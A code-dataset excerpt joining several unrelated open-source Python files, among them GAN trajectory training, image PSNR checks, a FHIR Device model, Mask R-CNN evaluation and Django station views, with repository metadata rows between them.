logger.info('Restoring from checkpoint {}'.format(restore_path))
checkpoint = torch.load(restore_path)
generator.load_state_dict(checkpoint['g_state'])
discriminator.load_state_dict(checkpoint['d_state'])
optimizer_g.load_state_dict(checkpoint['g_optim_state'])
optimizer_d.load_state_dict(checkpoint['d_optim_state'])
t = checkpoint['counters']['t']
epoch = checkpoint['counters']['epoch']
checkpoint['restore_ts'].append(t)
else:
t, epoch = 0, 0
checkpoint = {
'args': args.__dict__,
'G_losses': defaultdict(list),
'D_losses': defaultdict(list),
'losses_ts': [],
'metrics_val': defaultdict(list),
'metrics_train': defaultdict(list),
'sample_ts': [],
'restore_ts': [],
'norm_g': [],
'norm_d': [],
'counters': {
't': None,
'epoch': None,
},
'g_state': None,
'g_optim_state': None,
'd_state': None,
'd_optim_state': None,
'g_best_state': None,
'd_best_state': None,
'best_t': None,
'g_best_nl_state': None,
'd_best_state_nl': None,
'best_t_nl': None,
}
t0 = None
while t < args.num_iterations:
gc.collect()
d_steps_left = args.d_steps
g_steps_left = args.g_steps
epoch += 1
logger.info('Starting epoch {}'.format(epoch))
for batch in train_loader:
if args.timing == 1:
torch.cuda.synchronize()
t1 = time.time()
if d_steps_left > 0:
step_type = 'd'
losses_d = discriminator_step(args, batch, generator,
discriminator, d_loss_fn,
optimizer_d)
checkpoint['norm_d'].append(
get_total_norm(discriminator.parameters()))
d_steps_left -= 1
elif g_steps_left > 0:
step_type = 'g'
losses_g = generator_step(args, batch, generator,
discriminator, g_loss_fn,
optimizer_g)
checkpoint['norm_g'].append(
get_total_norm(generator.parameters())
)
g_steps_left -= 1
if args.timing == 1:
torch.cuda.synchronize()
t2 = time.time()
logger.info('{} step took {}'.format(step_type, t2 - t1))
if d_steps_left > 0 or g_steps_left > 0:
continue
if args.timing == 1:
if t0 is not None:
logger.info('Interation {} took {}'.format(
t - 1, time.time() - t0
))
t0 = time.time()
if t % args.print_every == 0:
logger.info('t = {} / {}'.format(t + 1, args.num_iterations))
for k, v in sorted(losses_d.items()):
logger.info(' [D] {}: {:.3f}'.format(k, v))
checkpoint['D_losses'][k].append(v)
for k, v in sorted(losses_g.items()):
logger.info(' [G] {}: {:.3f}'.format(k, v))
checkpoint['G_losses'][k].append(v)
checkpoint['losses_ts'].append(t)
if t > 0 and t % args.checkpoint_every == 0:
checkpoint['counters']['t'] = t
checkpoint['counters']['epoch'] = epoch
checkpoint['sample_ts'].append(t)
logger.info('Checking stats on val ...')
metrics_val = check_accuracy(
args, val_loader, generator, discriminator, d_loss_fn
)
logger.info('Checking stats on train ...')
metrics_train = check_accuracy(
args, train_loader, generator, discriminator,
d_loss_fn, limit=True
)
for k, v in sorted(metrics_val.items()):
logger.info(' [val] {}: {:.3f}'.format(k, v))
checkpoint['metrics_val'][k].append(v)
for k, v in sorted(metrics_train.items()):
logger.info(' [train] {}: {:.3f}'.format(k, v))
checkpoint['metrics_train'][k].append(v)
min_ade = min(checkpoint['metrics_val']['ade'])
min_ade_nl = min(checkpoint['metrics_val']['ade_nl'])
if metrics_val['ade'] == min_ade:
logger.info('New low for avg_disp_error')
checkpoint['best_t'] = t
checkpoint['g_best_state'] = generator.state_dict()
checkpoint['d_best_state'] = discriminator.state_dict()
if metrics_val['ade_nl'] == min_ade_nl:
logger.info('New low for avg_disp_error_nl')
checkpoint['best_t_nl'] = t
checkpoint['g_best_nl_state'] = generator.state_dict()
checkpoint['d_best_nl_state'] = discriminator.state_dict()
checkpoint['g_state'] = generator.state_dict()
checkpoint['g_optim_state'] = optimizer_g.state_dict()
checkpoint['d_state'] = discriminator.state_dict()
checkpoint['d_optim_state'] = optimizer_d.state_dict()
checkpoint_path = os.path.join(
args.output_dir, '%s_with_model.pt' % args.checkpoint_name
)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
torch.save(checkpoint, checkpoint_path)
logger.info('Done.')
checkpoint_path = os.path.join(
args.output_dir, '%s_no_model.pt' % args.checkpoint_name)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
key_blacklist = [
'g_state', 'd_state', 'g_best_state', 'g_best_nl_state',
'g_optim_state', 'd_optim_state', 'd_best_state',
'd_best_nl_state'
]
small_checkpoint = {}
for k, v in checkpoint.items():
if k not in key_blacklist:
small_checkpoint[k] = v
torch.save(small_checkpoint, checkpoint_path)
logger.info('Done.')
t += 1
d_steps_left = args.d_steps
g_steps_left = args.g_steps
if t >= args.num_iterations:
break
def discriminator_step(
args, batch, generator, discriminator, d_loss_fn, optimizer_d
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
data_loss = d_loss_fn(scores_real, scores_fake)
losses['D_data_loss'] = data_loss.item()
loss += data_loss
losses['D_total_loss'] = loss.item()
optimizer_d.zero_grad()
loss.backward()
if args.clipping_threshold_d > 0:
nn.utils.clip_grad_norm_(discriminator.parameters(),
args.clipping_threshold_d)
optimizer_d.step()
return losses
def generator_step(
args, batch, generator, discriminator, g_loss_fn, optimizer_g
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
g_l2_loss_rel = []
loss_mask = loss_mask[:, args.obs_len:]
for _ in range(args.best_k):
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
if args.l2_loss_weight > 0:
g_l2_loss_rel.append(args.l2_loss_weight * l2_loss(
pred_traj_fake_rel,
pred_traj_gt_rel,
loss_mask,
mode='raw'))
g_l2_loss_sum_rel = torch.zeros(1).to(pred_traj_gt)
if args.l2_loss_weight > 0:
g_l2_loss_rel = torch.stack(g_l2_loss_rel, dim=1)
for start, end in seq_start_end.data:
_g_l2_loss_rel = g_l2_loss_rel[start:end]
_g_l2_loss_rel = torch.sum(_g_l2_loss_rel, dim=0)
_g_l2_loss_rel = torch.min(_g_l2_loss_rel) / torch.sum(
loss_mask[start:end])
g_l2_loss_sum_rel += _g_l2_loss_rel
losses['G_l2_loss_rel'] = g_l2_loss_sum_rel.item()
loss += g_l2_loss_sum_rel
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
discriminator_loss = g_loss_fn(scores_fake)
loss += discriminator_loss
losses['G_discriminator_loss'] = discriminator_loss.item()
losses['G_total_loss'] = loss.item()
optimizer_g.zero_grad()
loss.backward()
if args.clipping_threshold_g > 0:
nn.utils.clip_grad_norm_(
generator.parameters(), args.clipping_threshold_g
)
optimizer_g.step()
return losses
def check_accuracy(
args, loader, generator, discriminator, d_loss_fn, limit=False
):
d_losses = []
metrics = {}
g_l2_losses_abs, g_l2_losses_rel = ([],) * 2
disp_error, disp_error_l, disp_error_nl = ([],) * 3
f_disp_error, f_disp_error_l, f_disp_error_nl = ([],) * 3
total_traj, total_traj_l, total_traj_nl = 0, 0, 0
loss_mask_sum = 0
generator.eval()
with torch.no_grad():
for batch in loader:
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel,
non_linear_ped, loss_mask, seq_start_end) = batch
linear_ped = 1 - non_linear_ped
loss_mask = loss_mask[:, args.obs_len:]
pred_traj_fake_rel = generator(
obs_traj, obs_traj_rel, seq_start_end
)
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
g_l2_loss_abs, g_l2_loss_rel = cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake,
pred_traj_fake_rel, loss_mask
)
ade, ade_l, ade_nl = cal_ade(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
fde, fde_l, fde_nl = cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
d_loss = d_loss_fn(scores_real, scores_fake)
d_losses.append(d_loss.item())
g_l2_losses_abs.append(g_l2_loss_abs.item())
g_l2_losses_rel.append(g_l2_loss_rel.item())
disp_error.append(ade.item())
disp_error_l.append(ade_l.item())
disp_error_nl.append(ade_nl.item())
f_disp_error.append(fde.item())
f_disp_error_l.append(fde_l.item())
f_disp_error_nl.append(fde_nl.item())
loss_mask_sum += torch.numel(loss_mask.data)
total_traj += pred_traj_gt.size(1)
total_traj_l += torch.sum(linear_ped).item()
total_traj_nl += torch.sum(non_linear_ped).item()
if limit and total_traj >= args.num_samples_check:
break
metrics['d_loss'] = sum(d_losses) / len(d_losses)
metrics['g_l2_loss_abs'] = sum(g_l2_losses_abs) / loss_mask_sum
metrics['g_l2_loss_rel'] = sum(g_l2_losses_rel) / loss_mask_sum
metrics['ade'] = sum(disp_error) / (total_traj * args.pred_len)
metrics['fde'] = sum(f_disp_error) / total_traj
if total_traj_l != 0:
metrics['ade_l'] = sum(disp_error_l) / (total_traj_l * args.pred_len)
metrics['fde_l'] = sum(f_disp_error_l) / total_traj_l
else:
metrics['ade_l'] = 0
metrics['fde_l'] = 0
if total_traj_nl != 0:
metrics['ade_nl'] = sum(disp_error_nl) / (
total_traj_nl * args.pred_len)
metrics['fde_nl'] = sum(f_disp_error_nl) / total_traj_nl
else:
metrics['ade_nl'] = 0
metrics['fde_nl'] = 0
generator.train()
return metrics
def cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake, pred_traj_fake_rel,
loss_mask
):
g_l2_loss_abs = l2_loss(
pred_traj_fake, pred_traj_gt, loss_mask, mode='sum'
)
g_l2_loss_rel = l2_loss(
pred_traj_fake_rel, pred_traj_gt_rel, loss_mask, mode='sum'
)
return g_l2_loss_abs, g_l2_loss_rel
def cal_ade(pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped):
ade = displacement_error(pred_traj_fake, pred_traj_gt)
ade_l = displacement_error(pred_traj_fake, pred_traj_gt, linear_ped)
ade_nl = displacement_error(pred_traj_fake, pred_traj_gt, non_linear_ped)
return ade, ade_l, ade_nl
def cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
):
fde = final_displacement_error(pred_traj_fake[-1], pred_traj_gt[-1])
fde_l = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], linear_ped
)
fde_nl = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], non_linear_ped
)
return fde, fde_l, fde_nl
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| true
| true
|
1c4933fa5c3c74bc7f7cab569a7ff8836860a861
| 816
|
py
|
Python
|
CompressionCheck.py
|
BryanYehuda/CompressionMethodComparison
|
79db365b46242e49116f92bb871545c0fce26635
|
[
"MIT"
] | 1
|
2021-06-11T13:19:11.000Z
|
2021-06-11T13:19:11.000Z
|
CompressionCheck.py
|
BryanYehuda/CompressionMethodComparison
|
79db365b46242e49116f92bb871545c0fce26635
|
[
"MIT"
] | null | null | null |
CompressionCheck.py
|
BryanYehuda/CompressionMethodComparison
|
79db365b46242e49116f92bb871545c0fce26635
|
[
"MIT"
] | null | null | null |
from math import log10, sqrt
import cv2
import numpy as np
def PSNR(original, compressed):
mse = np.mean((original - compressed) ** 2)
if(mse == 0):
return 100
max_pixel = 255.0
psnr = 20 * log10(max_pixel / sqrt(mse))
return psnr
def SNR(original, compressed):
mse = np.mean((original - compressed) ** 2)
if(mse == 0):
return 100
snr = 20 * log10(np.mean(original) / sqrt(mse))
return snr
def main():
original = cv2.imread("raw.png")
compressed = cv2.imread("lossy.png", 1)
mse = np.mean((original - compressed) ** 2)
snr = SNR(original, compressed)
psnr = PSNR(original, compressed)
print(f"MSE value is {mse}")
print(f"SNR value is {snr} dB")
print(f"PSNR value is {psnr} dB")
if __name__ == "__main__":
main()
| 26.322581
| 51
| 0.604167
|
from math import log10, sqrt
import cv2
import numpy as np
def PSNR(original, compressed):
mse = np.mean((original - compressed) ** 2)
if(mse == 0):
return 100
max_pixel = 255.0
psnr = 20 * log10(max_pixel / sqrt(mse))
return psnr
def SNR(original, compressed):
mse = np.mean((original - compressed) ** 2)
if(mse == 0):
return 100
snr = 20 * log10(np.mean(original) / sqrt(mse))
return snr
def main():
original = cv2.imread("raw.png")
compressed = cv2.imread("lossy.png", 1)
mse = np.mean((original - compressed) ** 2)
snr = SNR(original, compressed)
psnr = PSNR(original, compressed)
print(f"MSE value is {mse}")
print(f"SNR value is {snr} dB")
print(f"PSNR value is {psnr} dB")
if __name__ == "__main__":
main()
| true
| true
|
1c49346a3a2d0de5170f4908b321fa9da8a9a573
| 5,190
|
py
|
Python
|
fhir/resources/DSTU2/device.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/DSTU2/device.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/DSTU2/device.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 (http://hl7.org/fhir/StructureDefinition/Device) on 2019-05-14.
# 2019, SMART Health IT.
from . import (annotation, codeableconcept, contactpoint, domainresource,
fhirdate, fhirreference, identifier)
class Device(domainresource.DomainResource):
""" An instance of a manufactured te that is used in the provision of
healthcare.
This resource identifies an instance of a manufactured item that is used in
the provision of healthcare without being substantially changed through
that activity. The device may be a medical or non-medical device. Medical
devices includes durable (reusable) medical equipment, implantable devices,
as well as disposable equipment used for diagnostic, treatment, and
research for healthcare and public health. Non-medical devices may include
items such as a machine, cellphone, computer, application, etc.
"""
resource_name = "Device"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.contact = None
""" Details for human/organization for support.
List of `ContactPoint` items (represented as `dict` in JSON). """
self.expiry = None
""" Date and time of expiry of this device (if applicable).
Type `FHIRDate` (represented as `str` in JSON). """
self.identifier = None
""" Instance id from manufacturer, owner, and others.
List of `Identifier` items (represented as `dict` in JSON). """
self.location = None
""" Where the resource is found.
Type `FHIRReference` referencing `Location` (represented as `dict` in JSON). """
self.lotNumber = None
""" Lot number of manufacture.
Type `str`. """
self.manufactureDate = None
""" Manufacture date.
Type `FHIRDate` (represented as `str` in JSON). """
self.manufacturer = None
""" Name of device manufacturer.
Type `str`. """
self.model = None
""" Model id assigned by the manufacturer.
Type `str`. """
self.note = None
""" Device notes and comments.
List of `Annotation` items (represented as `dict` in JSON). """
self.owner = None
""" Organization responsible for device.
Type `FHIRReference` referencing `Organization` (represented as `dict` in JSON). """
self.patient = None
""" If the resource is affixed to a person.
Type `FHIRReference` referencing `Patient` (represented as `dict` in JSON). """
self.status = None
""" available | not-available | entered-in-error.
Type `str`. """
self.type = None
""" What kind of device this is.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.udi = None
""" FDA mandated Unique Device Identifier.
Type `str`. """
self.url = None
""" Network address to contact device.
Type `str`. """
self.version = None
""" Version number (i.e. software).
Type `str`. """
super(Device, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(Device, self).elementProperties()
js.extend(
[
("contact", "contact", contactpoint.ContactPoint, True, None, False),
("expiry", "expiry", fhirdate.FHIRDate, False, None, False),
("identifier", "identifier", identifier.Identifier, True, None, False),
(
"location",
"location",
fhirreference.FHIRReference,
False,
None,
False,
),
("lotNumber", "lotNumber", str, False, None, False),
(
"manufactureDate",
"manufactureDate",
fhirdate.FHIRDate,
False,
None,
False,
),
("manufacturer", "manufacturer", str, False, None, False),
("model", "model", str, False, None, False),
("note", "note", annotation.Annotation, True, None, False),
("owner", "owner", fhirreference.FHIRReference, False, None, False),
("patient", "patient", fhirreference.FHIRReference, False, None, False),
("status", "status", str, False, None, False),
("type", "type", codeableconcept.CodeableConcept, False, None, True),
("udi", "udi", str, False, None, False),
("url", "url", str, False, None, False),
("version", "version", str, False, None, False),
]
)
return js
| 37.608696
| 97
| 0.570328
|
from . import (annotation, codeableconcept, contactpoint, domainresource,
fhirdate, fhirreference, identifier)
class Device(domainresource.DomainResource):
resource_name = "Device"
def __init__(self, jsondict=None, strict=True):
self.contact = None
self.expiry = None
self.identifier = None
self.location = None
self.lotNumber = None
self.manufactureDate = None
self.manufacturer = None
self.model = None
self.note = None
self.owner = None
self.patient = None
self.status = None
self.type = None
self.udi = None
self.url = None
self.version = None
super(Device, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(Device, self).elementProperties()
js.extend(
[
("contact", "contact", contactpoint.ContactPoint, True, None, False),
("expiry", "expiry", fhirdate.FHIRDate, False, None, False),
("identifier", "identifier", identifier.Identifier, True, None, False),
(
"location",
"location",
fhirreference.FHIRReference,
False,
None,
False,
),
("lotNumber", "lotNumber", str, False, None, False),
(
"manufactureDate",
"manufactureDate",
fhirdate.FHIRDate,
False,
None,
False,
),
("manufacturer", "manufacturer", str, False, None, False),
("model", "model", str, False, None, False),
("note", "note", annotation.Annotation, True, None, False),
("owner", "owner", fhirreference.FHIRReference, False, None, False),
("patient", "patient", fhirreference.FHIRReference, False, None, False),
("status", "status", str, False, None, False),
("type", "type", codeableconcept.CodeableConcept, False, None, True),
("udi", "udi", str, False, None, False),
("url", "url", str, False, None, False),
("version", "version", str, False, None, False),
]
)
return js
| true
| true
|
1c4934d3e8034238ab0748a557fef674ad99a5a3
| 235
|
py
|
Python
|
create_game/tools/fixed_obj.py
|
clvrai/create
|
8d180cbdca01f4561655b889e82325a387afbeb6
|
[
"MIT"
] | 11
|
2019-12-04T07:41:47.000Z
|
2021-11-09T01:06:23.000Z
|
create_game/tools/fixed_obj.py
|
clvrai/create
|
8d180cbdca01f4561655b889e82325a387afbeb6
|
[
"MIT"
] | 2
|
2021-05-18T15:40:50.000Z
|
2021-09-08T02:19:32.000Z
|
create_game/tools/fixed_obj.py
|
clvrai/create
|
8d180cbdca01f4561655b889e82325a387afbeb6
|
[
"MIT"
] | null | null | null |
from .basic_obj import BasicObj
from pymunk import Body
class FixedObj(BasicObj):
def __init__(self, pos):
super().__init__(pos)
def _create_body(self, mass, inertia):
return Body(mass, inertia, Body.STATIC)
| 21.363636
| 47
| 0.693617
|
from .basic_obj import BasicObj
from pymunk import Body
class FixedObj(BasicObj):
def __init__(self, pos):
super().__init__(pos)
def _create_body(self, mass, inertia):
return Body(mass, inertia, Body.STATIC)
| true
| true
|
1c4934fde3364c912b12331800694316ba35f6c8
| 1,093
|
py
|
Python
|
maskrcnn_benchmark/data/datasets/evaluation/__init__.py
|
ashnair1/rotated_maskrcnn
|
c7208930ee361d32e98ad296bb5861e432dc6198
|
[
"MIT"
] | null | null | null |
maskrcnn_benchmark/data/datasets/evaluation/__init__.py
|
ashnair1/rotated_maskrcnn
|
c7208930ee361d32e98ad296bb5861e432dc6198
|
[
"MIT"
] | null | null | null |
maskrcnn_benchmark/data/datasets/evaluation/__init__.py
|
ashnair1/rotated_maskrcnn
|
c7208930ee361d32e98ad296bb5861e432dc6198
|
[
"MIT"
] | null | null | null |
from maskrcnn_benchmark.data import datasets
from .coco import coco_evaluation
from .voc import voc_evaluation
def evaluate(dataset, predictions, output_folder, **kwargs):
"""evaluate dataset using different methods based on dataset type.
Args:
dataset: Dataset object
predictions(list[BoxList]): each item in the list represents the
prediction results for one image.
output_folder: output folder, to save evaluation files or results.
**kwargs: other args.
Returns:
evaluation result
"""
args = dict(
dataset=dataset, predictions=predictions, output_folder=output_folder, **kwargs
)
if isinstance(dataset, datasets.COCODataset):
return coco_evaluation(**args)
elif isinstance(dataset, datasets.PascalVOCDataset):
return voc_evaluation(**args)
elif isinstance(dataset, datasets.iSAIDDataset):
return coco_evaluation(**args)
else:
dataset_name = dataset.__class__.__name__
raise NotImplementedError("Unsupported dataset type {}.".format(dataset_name))
| 36.433333
| 87
| 0.707228
|
from maskrcnn_benchmark.data import datasets
from .coco import coco_evaluation
from .voc import voc_evaluation
def evaluate(dataset, predictions, output_folder, **kwargs):
args = dict(
dataset=dataset, predictions=predictions, output_folder=output_folder, **kwargs
)
if isinstance(dataset, datasets.COCODataset):
return coco_evaluation(**args)
elif isinstance(dataset, datasets.PascalVOCDataset):
return voc_evaluation(**args)
elif isinstance(dataset, datasets.iSAIDDataset):
return coco_evaluation(**args)
else:
dataset_name = dataset.__class__.__name__
raise NotImplementedError("Unsupported dataset type {}.".format(dataset_name))
| true
| true
|
1c4935bed79fa1bba5b0b91761631a377901a072
| 342
|
py
|
Python
|
Testing/PythonTests/probeVolume.py
|
danlamanna/ShapeWorks
|
58ffac86cbea1e7f0b4ede9ff6ded167bd5dfc14
|
[
"MIT"
] | null | null | null |
Testing/PythonTests/probeVolume.py
|
danlamanna/ShapeWorks
|
58ffac86cbea1e7f0b4ede9ff6ded167bd5dfc14
|
[
"MIT"
] | null | null | null |
Testing/PythonTests/probeVolume.py
|
danlamanna/ShapeWorks
|
58ffac86cbea1e7f0b4ede9ff6ded167bd5dfc14
|
[
"MIT"
] | null | null | null |
import os
import sys
from shapeworks import *
def probeVolumeTest():
mesh = Mesh(os.environ["DATA"] + "/femur.vtk")
img = Image(os.environ["DATA"] + "/femurVtkDT.nrrd")
mesh.probeVolume(img)
compareMesh = Mesh(os.environ["DATA"] + "/probe.vtk")
return mesh == compareMesh
val = probeVolumeTest()
if val is False:
sys.exit(1)
| 19
| 55
| 0.678363
|
import os
import sys
from shapeworks import *
def probeVolumeTest():
mesh = Mesh(os.environ["DATA"] + "/femur.vtk")
img = Image(os.environ["DATA"] + "/femurVtkDT.nrrd")
mesh.probeVolume(img)
compareMesh = Mesh(os.environ["DATA"] + "/probe.vtk")
return mesh == compareMesh
val = probeVolumeTest()
if val is False:
sys.exit(1)
| true
| true
|
1c4936d5138483813b170c41446e09327d1b11f7
| 11,544
|
py
|
Python
|
applications/station/views.py
|
awwong1/apollo
|
5571b5f222265bec3eed45b21e862636ccdc9a97
|
[
"MIT"
] | null | null | null |
applications/station/views.py
|
awwong1/apollo
|
5571b5f222265bec3eed45b21e862636ccdc9a97
|
[
"MIT"
] | null | null | null |
applications/station/views.py
|
awwong1/apollo
|
5571b5f222265bec3eed45b21e862636ccdc9a97
|
[
"MIT"
] | null | null | null |
from apollo.choices import CHARGE_LIST_OPEN
from apollo.viewmixins import LoginRequiredMixin, ActivitySendMixin, StaffRequiredMixin
from applications.business.models import Business
from applications.charge_list.forms import ActivityChargeCatalog, TimeChargeCatalog, UnitChargeCatalog
from applications.charge_list.models import ChargeList
from applications.station.forms import StationBusinessForm, StationRentalForm
from applications.station.models import Station, StationBusiness, StationRental
from django.contrib import messages
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse_lazy
from django.shortcuts import get_object_or_404, redirect
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
def StationUUIDRedirect(request, station_uuid=None):
"""
Given a station guid, redirect to the station detail page.
If the station does not exist with the specified parameters, throw a 404 exception.
"""
station = get_object_or_404(Station, uuid=station_uuid)
return redirect('station_detail', kwargs={'pk': station.pk})
"""
Station model generic views.
"""
class StationViewList(LoginRequiredMixin, ListView):
context_object_name = "stations"
model = Station
template_name = "station/station_list.html"
def get_context_data(self, **kwargs):
context = super(StationViewList, self).get_context_data(**kwargs)
return context
class StationViewDetail(LoginRequiredMixin, DetailView):
context_object_name = 'station'
model = Station
template_name = "station/station_detail.html"
def get_context_data(self, **kwargs):
context = super(StationViewDetail, self).get_context_data(**kwargs)
user_businesses = Business.objects.filter(businessmembership__user=self.request.user)
station_businesses = self.object.stationbusiness_set.all()
context['can_modify'] = len(station_businesses.filter(business__in=user_businesses)) >= 1
active_cl = ChargeList.objects.filter(station=self.object, status=CHARGE_LIST_OPEN)
if len(active_cl) == 1:
context['chargelist'] = active_cl[0]
price_list_pk = active_cl[0].price_list.pk
context['activitycharge_catalog'] = ActivityChargeCatalog(price_list_pk=price_list_pk)
context['timecharge_catalog'] = TimeChargeCatalog(price_list_pk=price_list_pk)
context['unitcharge_catalog'] = UnitChargeCatalog(price_list_pk=price_list_pk)
return context
class StationViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was created successfully!"
template_name = "station/station_form.html"
activity_verb = 'created station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = user_businesses.filter(business=business)
if can_modify:
return super(StationViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create a station for this business.")
return redirect('business_detail', pk=business.pk)
def get_success_url(self):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
StationBusiness.objects.create(business=business, station=self.object)
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewCreate, self).get_context_data(**kwargs)
context['action'] = "Create New"
return context
class StationViewUpdate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, UpdateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was updated successfully!"
template_name = "station/station_form.html"
activity_verb = 'updated station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to update this station.")
return redirect('station_detail', pk=self.kwargs['pk'])
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewUpdate, self).get_context_data(**kwargs)
context['action'] = "Update"
return context
class StationViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'station'
model = Station
success_url = reverse_lazy('base')
template_name = "station/station_form.html"
activity_verb = 'deleted station'
target_object_valid = False
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this station.")
return redirect('station_detail', pk=station.pk)
def get_success_url(self):
return self.success_url
def get_context_data(self, **kwargs):
context = super(StationViewDelete, self).get_context_data(**kwargs)
context['action'] = "Delete"
return context
"""
Station Business Association generic views
"""
class StationBusinessViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'created station business association'
success_message = "%(station)s: %(business)s relation successfully created!"
form_class = StationBusinessForm
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('station_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationBusinessViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create this station business.")
return redirect('station_detail', pk=station.pk)
def get_form(self, form_class):
return form_class(station_pk=self.kwargs['station_pk'], **self.get_form_kwargs())
def get_success_url(self):
return reverse_lazy('station_detail', pk=self.kwargs['station_pk'])
def get_context_data(self, **kwargs):
context = super(StationBusinessViewCreate, self).get_context_data(**kwargs)
context['station'] = Station.objects.get(pk=self.kwargs['station_pk'])
return context
class StationBusinessViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'deleted station business association'
target_object_valid = False
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
stationbusiness = get_object_or_404(StationBusiness, pk=self.kwargs.get('pk', '-1'))
business = stationbusiness.business
station = stationbusiness.station
user_businesses = self.request.user.businessmembership_set.all()
can_modify = business.stationbusiness_set.all().filter(business__in=user_businesses)
last_business = len(station.stationbusiness_set.all()) == 1
if can_modify:
if last_business:
messages.warning(self.request, "You cannot delete the last station business for this station!")
